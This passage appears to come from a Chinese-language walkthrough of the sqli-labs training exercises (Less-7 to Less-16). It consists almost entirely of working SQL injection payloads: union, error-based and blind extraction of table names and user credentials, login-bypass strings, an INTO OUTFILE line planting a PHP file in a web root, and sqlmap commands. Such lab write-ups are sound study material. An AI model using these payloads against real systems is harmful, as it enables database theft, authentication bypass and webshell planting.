\u5c31...\/var\/www\/html\uff0c...\/var\/www\/html\/htdocs\n\nphpstudy \u5c31\u662f...\\PhpStudy20180211\\PHPTutorial\\WWW\\\n\nxammp \u5c31\u662f...\\xampp\\htdocs\n\nload_file()\u5bfc\u51fa\u6587\u4ef6\n\nLoad_file(file_name):\u8bfb\u53d6\u6587\u4ef6\u5e76\u8fd4\u56de\u8be5\u6587\u4ef6\u7684\u5185\u5bb9\u4f5c\u4e3a\u4e00\u4e2a\u5b57\u7b26\u4e32\u3002\n<\/code><\/pre>\n<p>\u4f7f\u7528\u6761\u4ef6\uff1a<\/p>\n<pre><code>A\u3001\u5fc5\u987b\u6709\u6743\u9650\u8bfb\u53d6\u5e76\u4e14\u6587\u4ef6\u5fc5\u987b\u5b8c\u5168\u53ef\u8bfb\nand (select count(*) from mysql.user)&gt;0\/* \u5982\u679c\u7ed3\u679c\u8fd4\u56de\u6b63\u5e38,\u8bf4\u660e\u5177\u6709\u8bfb\u5199\u6743\u9650\u3002\nand (select count(*) from mysql.user)&gt;0\/* \u8fd4\u56de\u9519\u8bef\uff0c\u5e94\u8be5\u662f\u7ba1\u7406\u5458\u7ed9\u6570\u636e\u5e93\u5e10\u6237\u964d\u6743\n\nB\u3001\u6b32\u8bfb\u53d6\u6587\u4ef6\u5fc5\u987b\u5728\u670d\u52a1\u5668\u4e0a\n\nC\u3001\u5fc5\u987b\u6307\u5b9a\u6587\u4ef6\u5b8c\u6574\u7684\u8def\u5f84\n\nD\u3001\u6b32\u8bfb\u53d6\u6587\u4ef6\u5fc5\u987b\u5c0f\u4e8emax_allowed_packet\n<\/code><\/pre>\n<p>\u5728less-2\u76f4\u63a5\u6ce8\u5165\u62ff\u5230\u8def\u5f84<\/p>\n<pre><code>https:\/\/daishen.ltd:1112\/Less-2\/?id=-1 union select 1,@@basedir,@@datadir --+\n<\/code><\/pre>\n<p>\u6ce8\u5165less-7<\/p>\n<p>Payload<\/p>\n<pre><code>?id=1')) union select 1,2,'&lt;?php phpinfo() ?&gt;' into outfile \"\/usr\/share\/nginx\/a.php\"--+        \u5199\u5165\u6728\u9a6c\n<\/code><\/pre>\n<pre><code>?id=1'))+UNION+SELECT * from security.users INTO OUTFILE \"\/var\/www\/html\/users.txt\"--+\t\t\u5bfc\u51fa\u6570\u636e\n<\/code><\/pre>\n<h1 id=\"less-8\"><strong>Less-8<\/strong><\/h1>\n<p><strong>GET &#8211; Blind &#8211; Boolian Based &#8211; Single Quotes (\u5e03\u5c14\u578b\u5355\u5f15\u53f7GET\u76f2\u6ce8)<\/strong><\/p>\n<p>&nbsp;<\/p>\n<p>\u5224\u65ad\u62a5\u9519<\/p>\n<pre><code>https:\/\/daishen.ltd:1112\/Less-8\/?id=1' and 1=1 --+\n\nhttps:\/\/daishen.ltd:1112\/Less-8\/?id=1' and 1=2 --+\n<\/code><\/pre>\n<p>\u5224\u65ad\u6570\u636e\u7248\u672c<\/p>\n<pre><code>https:\/\/daishen.ltd:1112\/Less-8\/?id=1' and left(version(),3)=5.5 --+\n<\/code><\/pre>\n<p>\u731c\u89e3\u5e93\u7684\u957f\u5ea6<\/p>\n<pre><code>https:\/\/daishen.ltd:1112\/Less-8\/?id=1' and length(database())=8 --+\n<\/code><\/pre>\n<p>\u731c\u89e3\u5e93\u540d<\/p>\n<pre><code>https:\/\/daishen.ltd:1112\/Less-8\/?id=1' and left((select database()),1)='s' --+\n\nhttps:\/\/daishen.ltd:1112\/Less-8\/?id=1' and left((select database()),8)='security' --+\n<\/code><\/pre>\n<p>\u731c\u89e3\u8868\u540d<\/p>\n<pre><code>https:\/\/daishen.ltd:1112\/Less-8\/?id=1' and left((select table_name from information_schema.tables where table_schema=database() limit 3,1),5)='users' --+\n<\/code><\/pre>\n<p>\u731c\u89e3\u5b57\u6bb5\u540d<\/p>\n<pre><code>https:\/\/daishen.ltd:1112\/Less-8\/?id=1' and left((select column_name from information_schema.columns where table_name='users' limit 0,1),1)='i' --+\n<\/code><\/pre>\n<p>\u731c\u89e3\u8bb0\u5f55<\/p>\n<pre><code>https:\/\/daishen.ltd:1112\/Less-8\/?id=1' and left((select username from users limit 0,1),1)='d' --+\n<\/code><\/pre>\n<h1 id=\"less-9\"><strong>Less-9<\/strong><\/h1>\n<p><strong>GET &#8211; Blind &#8211; Time based. &#8211;  Single Quotes  (\u57fa\u4e8e\u65f6\u95f4\u7684GET\u5355\u5f15\u53f7\u76f2\u6ce8)<\/strong><\/p>\n<p>&nbsp;<\/p>\n<p>\u5224\u65ad\u5ef6\u65f6<\/p>\n<pre><code>https:\/\/daishen.ltd:1112\/Less-9\/?id=1' and sleep(3) --+\n<\/code><\/pre>\n<p>\u731c\u89e3\u5e93\u7684\u957f\u5ea6<\/p>\n<pre><code>https:\/\/daishen.ltd:1112\/Less-9\/?id=1' and if(length(database())=8,sleep(3),1) --+\n<\/code><\/pre>\n<p>\u731c\u89e3\u5e93\u540d<\/p>\n<pre><code>https:\/\/daishen.ltd:1112\/Less-9\/?id=1' and if(left((select database()),1)='s',sleep(3),1) --+\n<\/code><\/pre>\n<p>\u731c\u89e3\u8868\u540d<\/p>\n<pre><code>https:\/\/daishen.ltd:1112\/Less-9\/?id=1' and if(left((select table_name from information_schema.tables where table_schema=database() limit 0,1),1)='e',sleep(3),1) --+\n<\/code><\/pre>\n<p>\u731c\u89e3\u5b57\u6bb5\u540d<\/p>\n<pre><code>https:\/\/daishen.ltd:1112\/Less-9\/?id=1' and if(left((select column_name from information_schema.columns where table_name='users' limit 0,1),1)='i',sleep(3),1) --+\n<\/code><\/pre>\n<p>\u731c\u89e3\u8bb0\u5f55<\/p>\n<pre><code>https:\/\/daishen.ltd:1112\/Less-9\/?id=1' and if(left((select username from users limit 0,1),1)='d',sleep(3),1) --+\n<\/code><\/pre>\n<h1 id=\"less-10\"><strong>Less-10<\/strong><\/h1>\n<p><strong>GET &#8211; Blind &#8211; Time based &#8211; double quotes (\u57fa\u4e8e\u65f6\u95f4\u7684\u53cc\u5f15\u53f7\u76f2\u6ce8)<\/strong><\/p>\n<p>&nbsp;<\/p>\n<p>\u5224\u65ad\u5ef6\u65f6<\/p>\n<pre><code>https:\/\/daishen.ltd:1112\/Less-10\/?id=1\u201d and sleep(3) --+\n<\/code><\/pre>\n<p>\u731c\u89e3\u5e93\u7684\u957f\u5ea6<\/p>\n<pre><code>https:\/\/daishen.ltd:1112\/Less-10\/?id=1\u201d and if(length(database())=8,sleep(3),1) --+\n<\/code><\/pre>\n<p>\u731c\u89e3\u5e93\u540d<\/p>\n<pre><code>https:\/\/daishen.ltd:1112\/Less-10\/?id=1\u201d and if(left((select database()),1)='s',sleep(3),1) --+\n<\/code><\/pre>\n<p>\u731c\u89e3\u8868\u540d<\/p>\n<pre><code>https:\/\/daishen.ltd:1112\/Less-10\/?id=1\" and if(left((select table_name from information_schema.tables where table_schema=database() limit 0,1),1)='e',sleep(3),1) --+\n<\/code><\/pre>\n<p>\u731c\u89e3\u5b57\u6bb5\u540d<\/p>\n<pre><code>https:\/\/daishen.ltd:1112\/Less-10\/?id=1\" and if(left((select column_name from information_schema.columns where table_name='users' limit 0,1),1)='i',sleep(3),1) --+\n<\/code><\/pre>\n<p>\u731c\u89e3\u8bb0\u5f55<\/p>\n<pre><code>https:\/\/daishen.ltd:1112\/Less-10\/?id=1\" and if(left((select username from users limit 0,1),1)='d',sleep(3),1) --+\n<\/code><\/pre>\n<h1 id=\"less-11\"><strong>Less-11<\/strong><\/h1>\n<p><strong>POST &#8211; Error Based &#8211; Single quotes- String (\u57fa\u4e8e\u9519\u8bef\u7684POST\u578b\u5355\u5f15\u53f7\u5b57\u7b26\u578b\u6ce8\u5165)<\/strong><\/p>\n<p>&nbsp;<\/p>\n<h3 id=\"\u4e07\u80fd\u5bc6\u7801-1\">\u4e07\u80fd\u5bc6\u7801<\/h3>\n<p>\u8fd9\u91cc\u62ff admin \u7528\u6237\u6765\u6a21\u62df\u767b\u5f55\u6d4b\u8bd5\uff0c\u9996\u5148\u67e5\u8be2\u51fa admin \u7684\u7528\u6237\u4fe1\u606f\u5982\u4e0b\uff1a<\/p>\n<pre><code class=\"language-shell\" lang=\"shell\">mysql&gt; select * from users where username = 'admin';\n+----+----------+----------+\n| id | username | password |\n+----+----------+----------+\n|  8 | admin    | admin    |\n+----+----------+----------+\n<\/code><\/pre>\n<p>\u56e0\u4e3a\u6838\u5fc3\u7684 SQL \u8bed\u53e5\u53ea\u4f7f\u7528\u5355\u5f15\u53f7\u62fc\u63a5\uff0c\u8fd9\u91cc\u5c31\u662f\u4e00\u4e2a\u7ecf\u5178\u7684\u4e07\u80fd\u5bc6\u7801\u6f0f\u6d1e\uff0c\u53ef\u4ee5\u4f7f\u7528\u5982\u4e0b Payload \u6765\u767b\u5f55\u7cfb\u7edf\uff1a<\/p>\n<pre><code class=\"language-shell\" lang=\"shell\"># \u6ce8\u91ca\u6389 passwd \u6765\u767b\u5f55\nuname=admin'--+&amp;passwd=&amp;submit=Submit\nuname=admin'#&amp;passwd=&amp;submit=Submit\n\n# \u6ce8\u91ca\u540e\u9762\u8bed\u53e5 \u5e76 \u6dfb\u52a0\u4e00\u4e2a\u6c38\u771f\u6761\u4ef6\nuname=admin&amp;passwd=1' or 1--+&amp;submit=Submit\nuname=admin&amp;passwd=1'||1--+&amp;submit=Submit\nuname=admin&amp;passwd=1' or 1#&amp;submit=Submit\nuname=admin&amp;passwd=1'||1#&amp;submit=Submit\n\n# \u95ed\u5408\u540e\u9762\u8bed\u53e5 \u5e76 \u6dfb\u52a0\u4e00\u4e2a\u6c38\u771f\u6761\u4ef6\nuname=admin&amp;passwd=1'or'1'='1&amp;submit=Submit\nuname=admin&amp;passwd=1'||'1'='1&amp;submit=Submit\n<\/code><\/pre>\n<p>\u56e0\u4e3a\u8fd9\u662f\u4e00\u4e2a POST \u578b\u7684\u6ce8\u5165\uff0c\u90a3\u4e48\u56fd\u5149\u8fd9\u91cc\u5c31\u518d\u5570\u55e6\u4e00\u904d\uff0c\u8d70\u4e00\u904d\u8be6\u7ec6\u7684\u6d41\u7a0b\u5427<\/p>\n<h3 id=\"\u8054\u5408\u67e5\u8be2\u6ce8\u5165-1\">\u8054\u5408\u67e5\u8be2\u6ce8\u5165<\/h3>\n<blockquote><p>POST \u6570\u636e\u91cc\u9762\u4e0d\u80fd\u6709 <code>+<\/code>\uff0c\u8fd9\u91cc\u5f97\u624b\u52a8\u8f6c\u6362\u4e3a\u7a7a\u683c<\/p><\/blockquote>\n<pre><code class=\"language-payload\" lang=\"payload\">uname=admin&amp;passwd=1'union select 1,(SELECT GROUP_CONCAT(username,password) FROM users)#&amp;submit=Submit\n<\/code><\/pre>\n<p>\u66b4\u8868payload<\/p>\n<pre><code>uname=admin' and 1=2 union select 1,group_concat(table_name) from information_schema.tables where table_schema=database() --+&amp;passwd=admin&amp;submit=Submit\n<\/code><\/pre>\n<p>\u66b4\u5b57\u6bb5<\/p>\n<pre><code>uname=admin' and 1=2 union select 1,group_concat(column_name) from information_schema.columns where table_name='users' --+&amp;passwd=admin&amp;submit=Submit\n<\/code><\/pre>\n<p>\u66b4\u5185\u5bb9<\/p>\n<pre><code>uname=admin' and 1=2 union select 1,group_concat(username,0x3a,password,0x23) from users --+&amp;passwd=admin&amp;submit=Submit\n<\/code><\/pre>\n<h3 id=\"extractvalue\u62a5\u9519\u6ce8\u5165-1\">extractvalue\u62a5\u9519\u6ce8\u5165<\/h3>\n<p>\u7206\u5e93payload<\/p>\n<pre><code>uname=admin' and extractvalue(1,concat(0x7e,(select database()))) --+&amp;passwd=admin&amp;submit=Submit\n<\/code><\/pre>\n<p>\u7206\u8868payload<\/p>\n<pre><code>uname=admin' and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()))) --+&amp;passwd=admin&amp;submit=Submit\n<\/code><\/pre>\n<p>\u7206\u5217\u540dpayload<\/p>\n<pre><code>uname=admin' and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users'))) --+&amp;passwd=admin&amp;submit=Submit\n<\/code><\/pre>\n<p>\u7206\u503cpayload<\/p>\n<pre><code>uname=admin' and extractvalue(1,concat(0x7e,(select group_concat(username,0x3a,password) from users)))--+&amp;passwd=admin&amp;submit=Submit\n<\/code><\/pre>\n<h3 id=\"sqlmap\">sqlmap<\/h3>\n<p><strong>\u52a0\u8f7d\u76ee\u6807<\/strong><\/p>\n<p>\u53ef\u4ee5\u76f4\u63a5\u5c06 Burpsuite \u622a\u53d6\u7684\u6570\u636e\u5305\u5185\u5bb9\u4fdd\u6301\u4e3a\u6587\u672c\u683c\u5f0f <code>test.txt<\/code>\uff1a<\/p>\n<pre><code class=\"language-http\" lang=\"http\">POST \/Less-11\/ HTTP\/1.1\nHost: daishen.ltd:1112\nUser-Agent: Mozilla\/5.0 (Macintosh; Intel Mac OS X 10.14; rv:56.0) Gecko\/20100101 Firefox\/56.0\nAccept: text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8\nAccept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3\nAccept-Encoding: gzip, deflate\nReferer: https:\/\/daishen.ltd:1112\/Less-11\/\nContent-Type: application\/x-www-form-urlencoded\nContent-Length: 38\nConnection: close\nUpgrade-Insecure-Requests: 1\n\nuname=admin&amp;passwd=2333&amp;submit=Submit\n<\/code><\/pre>\n<p>\u7136\u540e\u76f4\u63a5\u4f7f\u7528 sqlmap \u7684 -r \u53c2\u6570\u6765\u52a0\u8f7d\u8fd9\u4e2a\u8bf7\u6c42\u5305\uff1a<\/p>\n<pre><code class=\"language-shell\" lang=\"shell\">sqlmap -r test.txt\n<\/code><\/pre>\n<p>\u4e5f\u53ef\u4ee5\u624b\u52a8\u901a\u8fc7 <code>--data<\/code> \u6765\u5bf9 POST \u7684\u6570\u636e\u5305\u5185\u5bb9\u8fdb\u884c\u6ce8\u5165\u68c0\u6d4b\uff1a<\/p>\n<pre><code class=\"language-shell\" lang=\"shell\">sqlmap -u \"https:\/\/daishen.ltd:1112\/Less-11\/\" --data=\"uname=admin&amp;passwd=2333&amp;submit=Submit\"\n<\/code><\/pre>\n<p>\u5b9e\u9645\u4e0a <code>--data<\/code> \u6bd4\u8f83\u9e21\u808b\uff0c\u64cd\u4f5c\u6548\u7387\u6bd4\u8f83\u4f4e\uff0c\u56e0\u4e3a\u6bd4\u8f83\u51b7\u95e8\uff0c\u6240\u6709\u9002\u5408\u6765\u70ab\u8000\u81ea\u5df1\u4f1a\u8fd9\u4e2a\u53c2\u6570\uff0c\u8fd9\u6837\u5bf9 sqlmap \u4e0d\u591f\u4e86\u89e3\u7684\u4eba \u5c31\u4f1a\u89c9\u5f97\u5f88\u9ad8\u5927\u4e0a\u3002\u6240\u4ee5\u63a5\u4e0b\u6765\u90fd\u4f7f\u7528 <code>--data<\/code> \u8fd9\u4e2a\u53c2\u6570\u6765\u8fdb\u884c\u6ce8\u5165<\/p>\n<p><strong>\u8054\u5408\u67e5\u8be2\u6ce8\u5165<\/strong><\/p>\n<pre><code class=\"language-shell\" lang=\"shell\">sqlmap -u \"https:\/\/daishen.ltd:1112\/Less-11\/\" --data=\"uname=admin&amp;passwd=2333&amp;submit=Submit\" -p \"uname\" --dbms=MySQL --random-agent --flush-session --technique=U -v 3\n<\/code><\/pre>\n<p><strong>\u62a5\u9519\u6ce8\u5165<\/strong><\/p>\n<pre><code class=\"language-shell\" lang=\"shell\">sqlmap -u \"https:\/\/daishen.ltd:1112\/Less-11\/\" --data=\"uname=admin&amp;passwd=2333&amp;submit=Submit\" -p \"uname\" --dbms=MySQL --random-agent --flush-session --technique=B -v 3\n<\/code><\/pre>\n<p><strong>\u5e03\u5c14\u76f2\u6ce8<\/strong><\/p>\n<pre><code class=\"language-shell\" lang=\"shell\">sqlmap -u \"https:\/\/daishen.ltd:1112\/Less-11\/\" --data=\"uname=admin&amp;passwd=2333&amp;submit=Submit\" -p \"uname\" --dbms=MySQL --random-agent --flush-session --technique=B -v 3\n<\/code><\/pre>\n<p><strong>\u5ef6\u65f6\u76f2\u6ce8<\/strong><\/p>\n<pre><code class=\"language-shell\" lang=\"shell\">sqlmap -u \"https:\/\/daishen.ltd:1112\/Less-11\/\" --data=\"uname=admin&amp;passwd=2333&amp;submit=Submit\" -p \"uname\" --dbms=MySQL --random-agent --flush-session --technique=T -v 3\n<\/code><\/pre>\n<h1 id=\"less-12\"><strong>Less-12<\/strong><\/h1>\n<p><strong>POST &#8211; Error Based &#8211; Double quotes- String-with twist (\u57fa\u4e8e\u9519\u8bef\u7684\u53cc\u5f15\u53f7POST\u578b\u5b57\u7b26\u578b\u53d8\u5f62\u7684\u6ce8\u5165)<\/strong><\/p>\n<p>&nbsp;<\/p>\n<h3 id=\"\u8054\u5408\u67e5\u8be2\u6ce8\u5165-2\">\u8054\u5408\u67e5\u8be2\u6ce8\u5165<\/h3>\n<blockquote><p>POST \u6570\u636e\u91cc\u9762\u4e0d\u80fd\u6709 <code>+<\/code>\uff0c\u8fd9\u91cc\u5f97\u624b\u52a8\u8f6c\u6362\u4e3a\u7a7a\u683c<\/p><\/blockquote>\n<pre><code class=\"language-payload\" lang=\"payload\">uname=admin&amp;passwd=1\")union select 1,(SELECT GROUP_CONCAT(username,password) FROM users)#&amp;submit=Submit\n<\/code><\/pre>\n<p>\u7206\u51fa\u4f4d\u7f6e<\/p>\n<pre><code>uname=0\") union select 1,2 --+&amp;passwd=admin&amp;submit=Submit\n<\/code><\/pre>\n<p>\u66b4\u5e93payload<\/p>\n<pre><code>uname=0\") union select 1,database() --+&amp;passwd=admin&amp;submit=Submit\n<\/code><\/pre>\n<p>\u66b4\u8868payload<\/p>\n<pre><code>uname=admin\") and 1=2 union select 1,group_concat(table_name) from information_schema.tables where table_schema=database() --+&amp;passwd=admin&amp;submit=Submit\n<\/code><\/pre>\n<p>\u66b4\u5b57\u6bb5<\/p>\n<pre><code>uname=admin\") and 1=2 union select 1,group_concat(column_name) from information_schema.columns where table_name='users' --+&amp;passwd=admin&amp;submit=Submit\n<\/code><\/pre>\n<p>\u66b4\u5185\u5bb9<\/p>\n<pre><code>uname=admin\") and 1=2 union select 1,group_concat(username,0x3a,password,0x23) from users --+&amp;passwd=admin&amp;submit=Submit\n<\/code><\/pre>\n<h3 id=\"extractvalue\u62a5\u9519\u6ce8\u5165-2\">extractvalue\u62a5\u9519\u6ce8\u5165<\/h3>\n<p>\u7206\u5e93payload<\/p>\n<pre><code>uname=admin\") and extractvalue(1,concat(0x7e,(select database()))) --+&amp;passwd=admin&amp;submit=Submit\n<\/code><\/pre>\n<p>\u7206\u8868payload<\/p>\n<pre><code>uname=admin\") and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()))) --+&amp;passwd=admin&amp;submit=Submit\n<\/code><\/pre>\n<p>\u7206\u5217\u540dpayload<\/p>\n<pre><code>uname=admin\") and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users'))) --+&amp;passwd=admin&amp;submit=Submit\n<\/code><\/pre>\n<p>\u7206\u503cpayload<\/p>\n<pre><code>uname=admin\") and extractvalue(1,concat(0x7e,(select group_concat(username,0x3a,password) from users)))--+&amp;passwd=admin&amp;submit=Submit\n<\/code><\/pre>\n<h3 id=\"\u4e07\u80fd\u5bc6\u7801-2\">\u4e07\u80fd\u5bc6\u7801<\/h3>\n<pre><code># \u6ce8\u91ca\u6389 passwd \u6765\u767b\u5f55\nuname=admin\")--+&amp;passwd=&amp;submit=Submit\nuname=admin\")#&amp;passwd=&amp;submit=Submit\n\n# \u6ce8\u91ca\u540e\u9762\u8bed\u53e5 \u5e76 \u6dfb\u52a0\u4e00\u4e2a\u6c38\u771f\u6761\u4ef6\nuname=admin&amp;passwd=1\") or 1--+&amp;submit=Submit\nuname=admin&amp;passwd=1\")||1--+&amp;submit=Submit\nuname=admin&amp;passwd=1\") or 1#&amp;submit=Submit\nuname=admin&amp;passwd=1\")||1#&amp;submit=Submit\n<\/code><\/pre>\n<h1 id=\"less-13\"><strong>Less-13<\/strong><\/h1>\n<p><strong>POST &#8211; Double Injection &#8211; Single quotes- String -twist (POST\u5355\u5f15\u53f7\u53d8\u5f62\u53cc\u6ce8\u5165)<\/strong><\/p>\n<p>&nbsp;<\/p>\n<h3 id=\"extractvalue\u62a5\u9519\u6ce8\u5165-3\">extractvalue\u62a5\u9519\u6ce8\u5165<\/h3>\n<p>\u7206\u5e93payload<\/p>\n<pre><code>uname=admin') and extractvalue(1,concat(0x7e,(select database()))) --+&amp;passwd=admin&amp;submit=Submit\n<\/code><\/pre>\n<p>\u7206\u8868payload<\/p>\n<pre><code>uname=admin') and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()))) --+&amp;passwd=admin&amp;submit=Submit\n<\/code><\/pre>\n<p>\u7206\u5217\u540dpayload<\/p>\n<pre><code>uname=admin') and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users'))) --+&amp;passwd=admin&amp;submit=Submit\n<\/code><\/pre>\n<p>\u7206\u503cpayload<\/p>\n<pre><code>uname=admin') and extractvalue(1,concat(0x7e,(select group_concat(username,0x3a,password) from users)))--+&amp;passwd=admin&amp;submit=Submit\n<\/code><\/pre>\n<h1 id=\"less-14\"><strong>Less-14<\/strong><\/h1>\n<p><strong>POST &#8211; Double Injection &#8211; Single quotes- String -twist (POST\u5355\u5f15\u53f7\u53d8\u5f62\u53cc\u6ce8\u5165)<\/strong><\/p>\n<p>&nbsp;<\/p>\n<h3 id=\"extractvalue\u62a5\u9519\u6ce8\u5165-4\">extractvalue\u62a5\u9519\u6ce8\u5165<\/h3>\n<p>\u7206\u5e93payload<\/p>\n<pre><code>uname=admin\" and extractvalue(1,concat(0x7e,(select database()))) --+&amp;passwd=admin&amp;submit=Submit\n<\/code><\/pre>\n<p>\u7206\u8868payload<\/p>\n<pre><code>uname=admin\" and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()))) --+&amp;passwd=admin&amp;submit=Submit\n<\/code><\/pre>\n<p>\u7206\u5217\u540dpayload<\/p>\n<pre><code>uname=admin\" and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users'))) --+&amp;passwd=admin&amp;submit=Submit\n<\/code><\/pre>\n<p>\u7206\u503cpayload<\/p>\n<pre><code>uname=admin\" and extractvalue(1,concat(0x7e,(select group_concat(username,0x3a,password) from users)))--+&amp;passwd=admin&amp;submit=Submit\n<\/code><\/pre>\n<h1 id=\"less-15\"><strong>less-15 <\/strong><\/h1>\n<p><strong>POST &#8211; Blind- Boolian\/time Based &#8211; Single quotes (\u57fa\u4e8ebool\u578b\/\u65f6\u95f4\u5ef6\u8fdf\u5355\u5f15\u53f7POST\u578b\u76f2\u6ce8)<\/strong><\/p>\n<p>&nbsp;<\/p>\n<h3 id=\"\u65b9\u6cd5\u4e00\u65f6\u95f4\u5ef6\u8fdf\u624b\u5de5\u6ce8\u5165-1\"><strong>\u65b9\u6cd5\u4e00\uff0c\u65f6\u95f4\u5ef6\u8fdf\u624b\u5de5\u6ce8\u5165<\/strong><\/h3>\n<p>\u65f6\u95f4\u5ef6\u8fdf\u6d4b\u8bd5payload<\/p>\n<pre><code>uname=admin' and sleep(5) --+&amp;passwd=admin&amp;submit=Submit\n<\/code><\/pre>\n<p>\u66b4\u5e93\u957f\u5ea6payload<\/p>\n<pre><code>uname=admin' and if(length(database())=8,sleep(3),1) --+&amp;passwd=admin&amp;submit=Submit\n<\/code><\/pre>\n<p>\u66b4\u5e93payload<\/p>\n<pre><code>uname=admin' and if(left(database(),2)='se',sleep(5),1) --+&amp;passwd=admin&amp;submit=Submit\n\nuname=admin' and if(left(database(),8)='security',sleep(5),1) --+&amp;passwd=admin&amp;submit=Submit\n<\/code><\/pre>\n<p>\u7206\u8868payload<\/p>\n<pre><code>uname=admin' and if(left((select table_name from information_schema.tables where table_schema=database() limit 3,1),1)='u',sleep(5),1) --+&amp;passwd=admin&amp;submit=Submit\n\nuname=admin' and if(left((select table_name from information_schema.tables where table_schema=database() limit 3,1),5)='users',sleep(5),1) --+&amp;passwd=admin&amp;submit=Submit\n<\/code><\/pre>\n<p>\u66b4\u51fa\u5217\u540d<\/p>\n<pre><code>uname=admin' and if(left((select column_name from information_schema.columns where table_name='users' limit 0,1),2)='id',sleep(3),1) --+&amp;passwd=admin&amp;submit=Submit\n<\/code><\/pre>\n<p>\u66b4\u503cpayload<\/p>\n<pre><code>uname=admin' and if(left((select username from users limit 0,1),1)='D',sleep(3),1) --+&amp;passwd=admin&amp;submit=Submit\n\n\nme=admin' and if(left((select username from users limit 0,1),4)='Dumb',sleep(3),1) --+&amp;passwd=admin&amp;submit=Submit\n<\/code><\/pre>\n<h3 id=\"\u65b9\u6cd5\u4e8c\u5e03\u5c14\u578b\u624b\u5de5\u6ce8\u5165-3\"><strong>\u65b9\u6cd5\u4e8c\uff0c\u5e03\u5c14\u578b\u624b\u5de5\u6ce8\u5165<\/strong><\/h3>\n<p>\u5224\u65ad\u6570\u636e\u5e93\u957f\u5ea6<\/p>\n<pre><code>uname=admin' and length(database())=8 --+&amp;passwd=admin&amp;submit=Submit\n<\/code><\/pre>\n<p>\u66b4\u529b\u7834\u51fb\u6570\u636e\u5e93\u540d<\/p>\n<pre><code>uname=admin' and left((select database()),1)='s' --+&amp;passwd=admin&amp;submit=Submit\n\nuname=admin' and left((select database()),8)='security' --+&amp;passwd=admin&amp;submit=Submit\n<\/code><\/pre>\n<p>\u66b4\u529b\u7834\u89e3\u8868\u540d<\/p>\n<pre><code>uname=admin' and left((select table_name from information_schema.tables where table_schema =database() limit 3,1),1)='u' --+&amp;passwd=admin&amp;submit=Submit\n\nuname=admin' and left((select table_name from information_schema.tables where table_schema =database() limit 3,1),5)='users' --+&amp;passwd=admin&amp;submit=Submit\n<\/code><\/pre>\n<p>\u66b4\u529b\u7834\u89e3\u5217\u540d<\/p>\n<pre><code>uname=admin' and left((select column_name from information_schema.columns where table_name ='users' limit 0,1),2)='id' --+&amp;passwd=admin&amp;submit=Submit\n<\/code><\/pre>\n<p>\u66b4\u529b\u7834\u89e3\u5b57\u6bb5<\/p>\n<pre><code>uname=admin' and left((select username from users limit 0,1),1)='D' --+&amp;passwd=admin&amp;submit=Submit\n<\/code><\/pre>\n<h1 id=\"less-16\"><strong>Less-16<\/strong><\/h1>\n<p><strong>POST &#8211; Blind- Boolian\/Time Based &#8211; Double quotes (\u57fa\u4e8ebool\u578b\/\u65f6\u95f4\u5ef6\u8fdf\u7684\u53cc\u5f15\u53f7POST\u578b\u76f2\u6ce8)<\/strong><\/p>\n<p>&nbsp;<\/p>\n<h3 id=\"\u65b9\u6cd5\u4e00\u65f6\u95f4\u5ef6\u8fdf\u624b\u5de5\u6ce8\u5165-2\"><strong>\u65b9\u6cd5\u4e00\uff0c\u65f6\u95f4\u5ef6\u8fdf\u624b\u5de5\u6ce8\u5165<\/strong><\/h3>\n<p>\u65f6\u95f4\u5ef6\u8fdf\u6d4b\u8bd5payload<\/p>\n<pre><code>uname=admin\") and sleep(5) --+&amp;passwd=admin&amp;submit=Submit\n<\/code><\/pre>\n<p>\u66b4\u5e93\u957f\u5ea6payload<\/p>\n<pre><code>uname=admin\") and if(length(database())=8,sleep(3),1) --+&amp;passwd=admin&amp;submit=Submit\n<\/code><\/pre>\n<p>\u66b4\u5e93payload<\/p>\n<pre><code>uname=admin\") and if(left(database(),2)='se',sleep(5),1) --+&amp;passwd=admin&amp;submit=Submit\n\nuname=admin\") and if(left(database(),8)='security',sleep(5),1) --+&amp;passwd=admin&amp;submit=Submit\n<\/code><\/pre>\n<p>\u7206\u8868payload<\/p>\n<pre><code>uname=admin\") and if(left((select table_name from information_schema.tables where table_schema=database() limit 3,1),1)='u',sleep(5),1) --+&amp;passwd=admin&amp;submit=Submit\n\nuname=admin\") and if(left((select table_name from information_schema.tables where table_schema=database() limit 3,1),5)='users',sleep(5),1) --+&amp;passwd=admin&amp;submit=Submit\n<\/code><\/pre>\n<p>\u66b4\u51fa\u5217\u540d<\/p>\n<pre><code>uname=admin\") and if(left((select column_name from information_schema.columns where table_name='users' limit 0,1),2)='id',sleep(3),1) --+&amp;passwd=admin&amp;submit=Submit\n<\/code><\/pre>\n<p>\u66b4\u503cpayload<\/p>\n<pre><code>uname=admin\") and if(left((select username from users limit 0,1),1)='D',sleep(3),1) --+&amp;passwd=admin&amp;submit=Submit\n\n\nuname=admin\") and if(left((select username from users limit 0,1),4)='Dumb',sleep(3),1) --+&amp;passwd=admin&amp;submit=Submit\n<\/code><\/pre>\n<h3 id=\"\u65b9\u6cd5\u4e8c\u5e03\u5c14\u578b\u624b\u5de5\u6ce8\u5165-4\"><strong>\u65b9\u6cd5\u4e8c\uff0c\u5e03\u5c14\u578b\u624b\u5de5\u6ce8\u5165<\/strong><\/h3>\n<p>\u5224\u65ad\u6570\u636e\u5e93\u957f\u5ea6<\/p>\n<pre><code>uname=admin\") and length(database())=8 --+&amp;passwd=admin&amp;submit=Submit\n<\/code><\/pre>\n<p>\u66b4\u529b\u7834\u51fb\u6570\u636e\u5e93\u540d<\/p>\n<pre><code>uname=admin\") and left((select database()),1)='s' --+&amp;passwd=admin&amp;submit=Submit\n\nuname=admin\") and left((select database()),8)='security' --+&amp;passwd=admin&amp;submit=Submit\n<\/code><\/pre>\n<p>\u66b4\u529b\u7834\u89e3\u8868\u540d<\/p>\n<pre><code>uname=admin\") and left((select table_name from information_schema.tables where table_schema =database() limit 3,1),1)='u' --+&amp;passwd=admin&amp;submit=Submit\n\nuname=admin\") and left((select table_name from 